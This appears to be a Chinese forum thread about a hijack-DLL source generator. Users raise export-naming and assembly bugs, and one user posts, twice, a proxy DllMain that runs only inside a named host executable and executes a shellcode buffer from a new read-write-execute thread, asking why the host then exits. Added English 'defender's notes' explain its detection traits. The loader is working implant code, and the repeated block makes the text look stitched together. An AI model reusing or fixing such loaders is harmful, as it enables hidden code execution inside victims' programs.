hijack dll Source Code Generator. support x86/x64
软件优化的一般, 还有不少东西没有优化到
.rdata节数据未知! 继续?
ord:1256
func_rva:001193E0
名称:RtlNtdllName
AheadSource.h line 141, 应该是不小心写错了。
例如User32.dll->_UserTestTokenForInteractive
解决办法:
#pragma comment(linker, "/EXPORT:后需要加两个下划线,最终生成出来的导出函数才会有一个下划线
我在生成的文件中添加了 shellcode 后,劫持是成功的,未报任何错误,但是当处理完新建的线程任务后,主程序 exe 就退出了。
我不知道哪里出错了,希望能帮忙看一下。
代码如下
/*
 * ThreadFunction - CreateThread entry point that copies the global `shellcode`
 * buffer into a freshly allocated RWX region of the current process and then
 * calls into it.  `shellcode` and `SHELLCODELEN` are defined outside this
 * listing.
 *
 * lpParameter is unused.
 * Returns 0 once the called code has returned, (DWORD)-1 if the allocation
 * failed and (DWORD)-2 if the copy failed.  Control only comes back to this
 * function if the called code itself returns.
 *
 * Defender's note: a private PAGE_EXECUTE_READWRITE allocation that is written
 * and then executed from a new thread is one of the most common behavioural
 * heuristics AV/EDR products alert on, and the first thing to look for when
 * triaging a DLL of this kind.
 */
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
    LPVOID newMemory;
    HANDLE currentProcess;
    SIZE_T bytesWritten;      /* out-param of WriteProcessMemory; never compared with SHELLCODELEN */
    BOOL didWeCopy = FALSE;
    // Get the current process handle (a pseudo-handle; no CloseHandle needed)
    currentProcess = GetCurrentProcess();
    // Allocate memory with Read+Write+Execute permissions.
    // Nothing in this function ever releases the region (no VirtualFree), so it
    // stays mapped for the life of the process.
    newMemory = VirtualAllocEx(currentProcess, NULL, SHELLCODELEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (newMemory == NULL)
        return -1;            /* becomes 0xFFFFFFFF in the DWORD return value */
    // Copy the shellcode into the memory we just created
    didWeCopy = WriteProcessMemory(currentProcess, newMemory, (LPCVOID)&shellcode, SHELLCODELEN, &bytesWritten);
    if (!didWeCopy)
        return -2;            /* the allocation above is leaked on this path */
    // Yay! Let's run our shellcode!
    // The buffer is invoked as a void(void) function on this thread; whatever it
    // does to the process happens inside the host.
    ((void(*)())newMemory)();
    return 0;
}
/*
 * DllMain - entry point of the proxy ("hijack") DLL.
 *
 * On DLL_PROCESS_ATTACH it runs the proxy's Load()/Init() (defined elsewhere),
 * then compares the host executable's file name - path stripped,
 * case-insensitive - against a hard-coded name; only on a match does it start
 * ThreadProc (defined elsewhere) and ThreadFunction.  On DLL_PROCESS_DETACH it
 * calls Free().  It always returns TRUE, so the host keeps running even when
 * Load()/Init() fail.
 *
 * Defender's note: the gate on the host image name is why a sample like this
 * looks inert when loaded by any other process (a sandbox runner, a test
 * harness); triage it under the named host or neutralise the comparison.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        // Stop DLL_THREAD_ATTACH/DETACH notifications for this module.
        DisableThreadLibraryCalls(hModule);
        // Load()/Init() set up the export forwarding; not part of this listing.
        if (Load() && Init())
        {
            TCHAR szAppName[MAX_PATH] = TEXT("QMProxyAcceler.exe");// change this to the host process name
            TCHAR szCurName[MAX_PATH];
            // Return value (failure/truncation) is not checked; on failure the
            // uninitialised szCurName is what gets compared below.
            GetModuleFileName(NULL, szCurName, MAX_PATH);
            // Reduce the full path to the bare file name.
            PathStripPath(szCurName);
            // Gate on the host process name (case-insensitive).
            if (StrCmpI(szCurName, szAppName) == 0)
            {
                // Start the patch thread or other work.
                // NULL is passed where the DWORD dwStackSize/dwCreationFlags are
                // expected; it only works because NULL converts to 0.  Threads
                // created inside DllMain do not begin running until DllMain
                // returns and the loader lock is released.
                HANDLE hThread = CreateThread(NULL, NULL, ThreadProc, NULL, NULL, NULL);
                if (hThread)
                {
                    CloseHandle(hThread);
                    // Second thread runs ThreadFunction; its handle is closed
                    // without a NULL check, so a failed CreateThread ends in
                    // CloseHandle(NULL).
                    HANDLE threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
                    CloseHandle(threadHandle);
                }
            }
        }
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
        // Tear down whatever Load()/Init() set up (defined elsewhere).
        Free();
    }
    return TRUE;
}
X86肯定不能用ml64编译,但是用ml编译会报错。
unresolved external symbol AheadLib_XXX 报这个错误怎么解决呢
假定我现在导出了ABC函数:
.DATA
EXTERN pfnAheadLib_ABC:dq;
.....
; AheadLib_ABC - exported trampoline: an indirect jmp through pfnAheadLib_ABC,
; the pointer declared in .DATA above, so the caller lands in the real export.
;
; NOTE(review): in this snippet the PROC follows the .DATA directive with no
; .CODE directive visible in between (part of the file is elided).  If that is
; also the layout in the real file, the jmp is assembled into a writable,
; non-executable data section and DEP faults the first call - which matches
; the crash described.  The code belongs under .CODE; making the data section
; executable only works around DEP instead of fixing the placement.
AheadLib_ABC PROC
    jmp pfnAheadLib_ABC
AheadLib_ABC ENDP
....
PVOID pfnAheadLib_ABC;
....
在 dllmain 里 load、init 都没问题,但是 EXE 调用 ABC 函数的话就崩溃了;如果把 DLL 的 data 段设置为可读可写可执行权限的话,一切没问题,所以我认为是 DEP 的事情,于是我在 Load/Init 完毕后添加了 VirtualProtectEx 函数调用,但是返回为 false……
请问怎么搞
我在生成的文件中添加了 shellcode 后,劫持是成功的,未报任何错误,但是当处理完新建的线程任务后,主程序 exe 就退出了。
我不知道哪里出错了,希望能帮忙看一下。
代码如下
/*
 * ThreadFunction - CreateThread entry point that copies the global `shellcode`
 * buffer into a freshly allocated RWX region of the current process and then
 * calls into it.  `shellcode` and `SHELLCODELEN` are defined outside this
 * listing.
 *
 * lpParameter is unused.
 * Returns 0 once the called code has returned, (DWORD)-1 if the allocation
 * failed and (DWORD)-2 if the copy failed.  Control only comes back to this
 * function if the called code itself returns.
 *
 * Defender's note: a private PAGE_EXECUTE_READWRITE allocation that is written
 * and then executed from a new thread is one of the most common behavioural
 * heuristics AV/EDR products alert on, and the first thing to look for when
 * triaging a DLL of this kind.
 */
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
    LPVOID newMemory;
    HANDLE currentProcess;
    SIZE_T bytesWritten;      /* out-param of WriteProcessMemory; never compared with SHELLCODELEN */
    BOOL didWeCopy = FALSE;
    // Get the current process handle (a pseudo-handle; no CloseHandle needed)
    currentProcess = GetCurrentProcess();
    // Allocate memory with Read+Write+Execute permissions.
    // Nothing in this function ever releases the region (no VirtualFree), so it
    // stays mapped for the life of the process.
    newMemory = VirtualAllocEx(currentProcess, NULL, SHELLCODELEN, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (newMemory == NULL)
        return -1;            /* becomes 0xFFFFFFFF in the DWORD return value */
    // Copy the shellcode into the memory we just created
    didWeCopy = WriteProcessMemory(currentProcess, newMemory, (LPCVOID)&shellcode, SHELLCODELEN, &bytesWritten);
    if (!didWeCopy)
        return -2;            /* the allocation above is leaked on this path */
    // Yay! Let's run our shellcode!
    // The buffer is invoked as a void(void) function on this thread; whatever it
    // does to the process happens inside the host.
    ((void(*)())newMemory)();
    return 0;
}
/*
 * DllMain - entry point of the proxy ("hijack") DLL.
 *
 * On DLL_PROCESS_ATTACH it runs the proxy's Load()/Init() (defined elsewhere),
 * then compares the host executable's file name - path stripped,
 * case-insensitive - against a hard-coded name; only on a match does it start
 * ThreadProc (defined elsewhere) and ThreadFunction.  On DLL_PROCESS_DETACH it
 * calls Free().  It always returns TRUE, so the host keeps running even when
 * Load()/Init() fail.
 *
 * Defender's note: the gate on the host image name is why a sample like this
 * looks inert when loaded by any other process (a sandbox runner, a test
 * harness); triage it under the named host or neutralise the comparison.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        // Stop DLL_THREAD_ATTACH/DETACH notifications for this module.
        DisableThreadLibraryCalls(hModule);
        // Load()/Init() set up the export forwarding; not part of this listing.
        if (Load() && Init())
        {
            TCHAR szAppName[MAX_PATH] = TEXT("QMProxyAcceler.exe");// change this to the host process name
            TCHAR szCurName[MAX_PATH];
            // Return value (failure/truncation) is not checked; on failure the
            // uninitialised szCurName is what gets compared below.
            GetModuleFileName(NULL, szCurName, MAX_PATH);
            // Reduce the full path to the bare file name.
            PathStripPath(szCurName);
            // Gate on the host process name (case-insensitive).
            if (StrCmpI(szCurName, szAppName) == 0)
            {
                // Start the patch thread or other work.
                // NULL is passed where the DWORD dwStackSize/dwCreationFlags are
                // expected; it only works because NULL converts to 0.  Threads
                // created inside DllMain do not begin running until DllMain
                // returns and the loader lock is released.
                HANDLE hThread = CreateThread(NULL, NULL, ThreadProc, NULL, NULL, NULL);
                if (hThread)
                {
                    CloseHandle(hThread);
                    // Second thread runs ThreadFunction; its handle is closed
                    // without a NULL check, so a failed CreateThread ends in
                    // CloseHandle(NULL).
                    HANDLE threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
                    CloseHandle(threadHandle);
                }
            }
        }
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
        // Tear down whatever Load()/Init() set up (defined elsewhere).
        Free();
    }
    return TRUE;
}
求导出符号??的方法!